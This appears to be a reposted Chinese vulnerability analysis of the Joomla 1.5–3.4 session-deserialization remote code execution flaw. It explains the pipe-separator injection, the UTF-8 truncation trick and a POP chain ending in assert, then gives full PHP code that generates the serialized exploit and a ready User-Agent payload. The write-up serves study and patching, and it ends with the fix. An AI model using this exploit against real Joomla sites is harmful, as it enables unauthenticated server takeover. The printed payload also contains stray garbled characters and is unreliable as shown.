Joomla遠端代碼執行漏洞分析

捕夢網在此說明一下這個漏洞的影響、如何觸發以及利用方法。這個漏洞影響Joomla 1.5 to 3.4全版本,並且利用漏洞無需登錄,只需要發送兩次封包即可(第一次:將session插入資料庫中,第二次發送同樣的資料包來取出session、觸發漏洞、執行任意代碼),後果是直接導致任意代碼執行。

0x00 漏洞點 —— 反序列化session

這個漏洞存在於反序列化session的過程中。

漏洞存在於libraries/joomla/session/session.php中,_validate函數,將ua和xff調用set方法設置到了session中(session.client.browser和session.client.forwarded)

protected function _validate($restart = false)
    {
        ...
 
        // Record proxy forwarded for in the session in case we need it later
        if (isset($_SERVER['HTTP_X_FORWARDED_FOR']))
        {
            $this->set('session.client.forwarded', $_SERVER['HTTP_X_FORWARDED_FOR']);
        }
 
        ...
        // Check for clients browser
        if (in_array('fix_browser', $this->_security) && isset($_SERVER['HTTP_USER_AGENT']))
        {
            $browser = $this->get('session.client.browser');
 
            if ($browser === null)
            {
                $this->set('session.client.browser', $_SERVER['HTTP_USER_AGENT']);
            }
            elseif ($_SERVER['HTTP_USER_AGENT'] !== $browser)
            {
                // @todo remove code: $this->_state = 'error';
                // @todo remove code: return false;
            }

最終跟隨他們倆進入資料庫,session表:

2015121512202868031

正常情況下,不存在任何問題。因為我們控制的只是反序列化物件中的一個字串,不會觸發反序列相關的漏洞。 但是,因為一個小姿勢,導致後面我們可以控制整個反序列化物件。

0x01 利用|字元偽造,控制整個反序列化字串

首先看看pch-013: https://github.com/80vul/phpcodz/blob/master/research/pch-013.md

和pch-013中的情況類似,joomla也沒有採用php自帶的session處理機制,而是用多種方式(包括database、memcache等)自己編寫了存儲session的容器(storage)。

 

其存儲格式為『鍵名 + 分隔號 + 經過 serialize() 函數反序列處理的值』,未正確處理多個分隔號的情況。

那麼,我們這裡就可以通過注入一個"|"符號,將它前面的部分全部認為是name,而|後面我就可以插入任意serialize字串,構造反序列化漏洞了。

2015121512205022510

 

但還有一個問題,在我們構造好的反序列化字串後面,還有它原本的內容,必須要截斷。而此處並不像SQL注入,還有注釋符可用。不知各位是否還記得當年wordpress出過的一個XSS,當時就是在插入資料庫的時候利用"%F0%9D%8C%86"字元將mysql中utf-8的欄位截斷了。

這裡我們用同樣的方法,在session進入資料庫的時候就截斷後面的內容,避免對我們反序列化過程造成影響。

 

0x02 構造POP執行鏈,執行任意代碼

在可以控制反序列化物件以後,只需建構一個能夠一步步調用的執行緒,即可進行一些危險的操作了。exp構造的執行緒,分別利用了如下類:

 

  1. JDatabaseDriverMysqli
  2. SimplePie

我們可以在JDatabaseDriverMysqli類的析構函數裡找到一處敏感操作:

public function __destruct()
{
    $this->disconnect();
}
...
public function disconnect()
{
    // Close the connection.
    if ($this->connection)
    {
        foreach ($this->disconnectHandlers as $h)
        {
            call_user_func_array($h, array( &$this));
        }
 
        mysqli_close($this->connection);
    }
 
    $this->connection = null;
}

當exp對象反序列化後,將會成為一個JDatabaseDriverMysqli類對象,不管中間如何執行,最後都將會調用__destruct,__destruct將會調用disconnect,disconnect裡有一處敏感函數:call_user_func_array。

但很明顯,這裡的call_user_func_array的第二個參數,是我們無法控制的。所以不能直接構造assert+eval來執行任意代碼。

於是這裡再次調用了一個物件:SimplePie類物件,和它的init方法組成一個回呼函數[new SimplePie(), ‘init’],傳入call_user_func_array。 跟進init方法:

function init()
    {
        // Check absolute bare minimum requirements.
        if ((function_exists('version_compare') && version_compare(PHP_VERSION, '4.3.0', '<')) || !extension_loaded('xml') || !extension_loaded('pcre'))
        {
            return false;
        }
        ...
        if ($this->feed_url !== null || $this->raw_data !== null)
        {
            $this->data = array();
            $this->multifeed_objects = array();
            $cache = false;
 
            if ($this->feed_url !== null)
            {
                $parsed_feed_url = SimplePie_Misc::parse_url($this->feed_url);
                // Decide whether to enable caching
                if ($this->cache && $parsed_feed_url['scheme'] !== '')
                {
                    $cache = call_user_func(array($this->cache_class, 'create'), $this->cache_location, call_user_func($this->cache_name_function, $this->feed_url), 'spc');
                }

很明顯,其中這兩個call_user_func將是觸發代碼執行的元兇。 所以,我將其中第二個call_user_func的第一個參數cache_name_function,賦值為assert,第二個參數賦值為我需要執行的代碼,就構造好了一個『回檔後門』。

所以,exp是怎麼生成的?給出生成代碼:

<?php
//header("Content-Type: text/plain");
class JSimplepieFactory {
}
class JDatabaseDriverMysql {
 
}
class SimplePie {
    var $sanitize;
    var $cache;
    var $cache_name_function;
    var $javascript;
    var $feed_url;
    function __construct()
    {
        $this->feed_url = "phpinfo();JFactory::getConfig();exit;";
        $this->javascript = 9999;
        $this->cache_name_function = "assert";
        $this->sanitize = new JDatabaseDriverMysql();
        $this->cache = true;
    }
}
 
class JDatabaseDriverMysqli {
    protected $a;
    protected $disconnectHandlers;
    protected $connection;
    function __construct()
    {
        $this->a = new JSimplepieFactory();
        $x = new SimplePie();
        $this->connection = 1;
        $this->disconnectHandlers = [
            [$x, "init"],
        ];
    }
}
 
$a = new JDatabaseDriverMysqli();
echo serialize($a);

將這個代碼生成的exp,以前面提到的注入『|』的變換方式,帶入前面提到的user-agent中,即可觸發代碼執行。 其中,需要將char(0)*char(0)替換成\0\0\0,因為在序列化的時候,protected類型變數會被轉換成\0*\0name的樣式,這個替換在原始程式碼中也可以看到:

$result = str_replace('\0\0\0', chr(0) . '*' . chr(0), $result);

建構的時候遇到一點小麻煩,那就是預設情況下SimplePie是沒有定義的,這也是為什麼在調用SimplePie之前先new了一個JSimplepieFactory的原因,因為JSimplepieFactory物件在載入時會調用import函數將SimplePie導入到當前工作環境:

2015121512205361071

 

而JSimplepieFactory有autoload,所以不再需要其他include來對其進行載入。 給出最終構造的POC(既是上訴php代碼生成的POC):

User-Agent: 123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:37:"ρhιτhσπpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}𝌆

給一張代碼成功執行的POC:

201512151250568219614501837463659

0x03 影響版本 & 修復方案

1.5 to 3.4全版本

更新到3.4.6版本

文章來源:http://drops.wooyun.org/papers/11330
圖片來源:https://pixabay.com/

您可能也會喜歡…

發佈留言